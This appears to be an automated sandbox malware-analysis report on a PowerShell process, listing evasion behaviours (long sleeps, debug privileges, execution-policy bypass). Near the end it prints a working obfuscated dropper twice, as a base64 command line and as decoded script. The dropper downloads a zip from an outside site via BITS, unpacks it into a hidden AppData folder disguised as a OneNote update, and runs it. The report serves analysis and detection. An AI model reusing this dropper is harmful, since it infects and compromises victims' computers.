Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2784 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9244 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6764 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6904 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6972 Thread sleep count: 9244 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tEventVmNetworkAdapter',
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapterX
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapterX
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapterX
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Add-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Get-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Bypasses PowerShell execution policy
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc LgAoACcAYwBkACcAKQAgACQAewBFAGAATgBWADoAYQBwAGAAcABgAEQAQQB0AGEAfQA7ACAAJAB7AEwAYABpAG4ASwB9AD0AKAAiAHsAMAB9AHsAMQB9AHsANQB9AHsANgB9AHsANwB9AHsANAB9AHsAOAB9AHsAMgB9AHsAMwB9ACIAIAAtAGYAIAAnAGgAdAAnACwAJwB0AHAAcwA6ACcALAAnAHcALgAnACwAJwBwAGgAcAAnACwAJwByAG0AcwAvACcALAAnAC8ALwB1AHMAaABlAHIAcwBrAGUAJwAsACcAbgB5AGEALgBjAG8ALgBrAGUAJwAsACcALwBmAG8AJwAsACcAdgBpAGUAJwApADsAIAAkAHsAUgBuAGAAVQBtAH0APQAuACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAewBSAFIAbgBgAFUATQB9AD0ALgAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAAMQAwADIANAAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOQA5ADkAOwAgACQAewBDAEgAYABSAFMAfQA9ACgAIgB7ADkAfQB7ADcAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAMAB9AHsAMwB9AHsANgB9AHsAMQB9AHsAMgB9AHsAOAB9ACIAIAAtAGYAJwBwAHMAJwAsACcAWAAnACwAJwBZACcALAAnAEoAJwAsACcAdAB1AHYAdwB4ACcALAAnAG4AbwAnACwAJwBLAEwATQBOAE8AUABSAFMAVABVAFYAVwAnACwAJwBtACcALAAnAFoAJwAsACcAYQBiAGMAZABlAGYAZwBoAGkAagBrAGwAJwAsACcAeQB6AEEAQgBDAEQARQBGAEcASABJACcAKQA7ACAAJAB7AHIAYABTAHQAUgB9AD0AJwAnADsAIAAkAHsAUgBgAEEATgB9AD0AJgAoACIAewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAGMAdAAnACwAJwBlACcALAAnAGoAJwAsACcATgBlAHcALQBPAGIAJwApACAAKAAiAHsAMAB9AHsAMgB9AHsAMQB9AHsAMwB9ACIALQBmACAAJwBTAHkAJwAsACcAZQBtAC4AUgBhAG4AZABvACcALAAnAHMAdAAnACwAJwBtACcAKQA7ACAAZgBvAHIAIAAoACQAewBJAH0APQAwADsAIAAkAHsASQB9ACAALQBsAHQAIAAkAHsAcgBgAE4AVQBtAH0AOwAgACQAewBpAH0AKwArACkAIAB7ACQAewByAFMAYABUAHIAfQArAD0AJAB7AEMAaABgAFIAUwB9AFsAJAB7AFIAYABBAG4AfQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB0ACcALAAnAG4AZQB4ACcAKQAuAEkAbgB2AG8AawBlACgAMAAsACAAJAB7AGMAYABIAFIAUwB9AC4AIgBMAGAARQBuAEcAdABIACIAKQBdAH0AOwAgACQAewBSAFoAYABJAHAAfQA9ACQAewByAGAAcwB0AFIAfQArACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHAAJwAsACcALgB6AGkAJwApADsAIAAkAHsAUABBAGAAVABoAH0APQAkAHsAZQBuAGAAVgBgADoAYQBQAFAAZABhAHQAYQB9ACsAJwBcACcAKwAkAHsAcgBaAGAAaQBwAH0AOwAgACQAewBQAGAAegBJAHAAfQA9ACQAewBFAE4AVgA6AGEAYABwAGAAcABkAGEAdABBAH0AKwAoACgAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAJwB7ADAAfQAnACwAJwBPAE4ARQBOADAAVABFACcALAAnAHUAcABkAGEAdABlAF8AJwApACkAIAAtAGYAWwBjAEgAQQByAF0AOQAyACkAKwAkAHsAUgBSAG4AYABVAG0AfQA7ACAAJgAoACIAewAyAH0AewAzAH0AewAxAH0AewA0AH0AewA1AH0AewAwAH0AIgAgAC0AZgAgACcAcgAnACwAJwBuACcALAAnAFMAdABhAHIAdAAtAEIAJwAsACcAaQB0AHMAVAByAGEAJwAsACcAcwAnACwAJwBmAGUAJwApACAALQBTAG8AdQByAGMAZQAgACQAewBsAGkAYABOAEsAfQAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJAB7AFAAYQBgAFQAaAB9ADsAIAAuACgAIgB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcAZQAnACwAJwB4AHAAYQAnACwAJwBlACcALAAnAG4AZAAtAGEAcgBjAGgAaQB2ACcAKQAgAC0AcABhAHQAaAAgACQAewBwAGEAYABUAEgAfQAgAC0AZABlAHMAdABpAG4AYQB0AGkAbwBuAHAAYQB0AGgAIAAkAHsAcABgAHoASQBQAH0AOwAgACQAewBmAGAATwBsAGQAfQA9AC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBlAG0AJwAsACcAdAAtAEkAdAAnACwAJwBHAGUAJwApACAAJAB7AHAAYAB6AEkAUAB9ACAALQBGAG8AcgBj
Encrypted powershell cmdline option found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded .('cd') ${E`NV:ap`p`DAta}; ${L`inK}=("{0}{1}{5}{6}{7}{4}{8}{2}{3}" -f 'ht','tps:','w.','php','rms/','//usherske','nya.co.ke','/fo','vie'); ${Rn`Um}=.("{1}{2}{0}"-f'Random','Ge','t-') -minimum 5 -maximum 9; ${RRn`UM}=.("{1}{2}{0}"-f 'Random','Ge','t-') -minimum 1024 -maximum 9999; ${CH`RS}=("{9}{7}{5}{0}{4}{10}{3}{6}{1}{2}{8}" -f'ps','X','Y','J','tuvwx','no','KLMNOPRSTUVW','m','Z','abcdefghijkl','yzABCDEFGHI'); ${r`StR}=''; ${R`AN}=&("{3}{2}{1}{0}"-f 'ct','e','j','New-Ob') ("{0}{2}{1}{3}"-f 'Sy','em.Rando','st','m'); for (${I}=0; ${I} -lt ${r`NUm}; ${i}++) {${rS`Tr}+=${Ch`RS}[${R`An}.("{1}{0}" -f 't','nex').Invoke(0, ${c`HRS}."L`EnGtH")]}; ${RZ`Ip}=${r`stR}+("{1}{0}"-f'p','.zi'); ${PA`Th}=${en`V`:aPPdata}+'\'+${rZ`ip}; ${P`zIp}=${ENV:a`p`pdatA}+((("{0}{1}{2}" -f'{0}','ONEN0TE','update_')) -f[cHAr]92)+${RRn`Um}; &("{2}{3}{1}{4}{5}{0}" -f 'r','n','Start-B','itsTra','s','fe') -Source ${li`NK} -Destination ${Pa`Th}; .("{0}{1}{3}{2}"-f 'e','xpa','e','nd-archiv') -path ${pa`TH} -destinationpath ${p`zIP}; ${f`Old}=.("{2}{1}{0}" -f'em','t-It','Ge') ${p`zIP} -Force; ${Fo`lD}."atT`RIbu`T`es"=("{1}{0}"-f 'n','Hidde'); .("{0}{1}{2}" -f 'Remo','v','e-Item') -path ${pa`Th}; &('cd') ${p`ZiP}; &("{1}{0}"-f'rt','sta') ("{3}{0}{2}{1}" 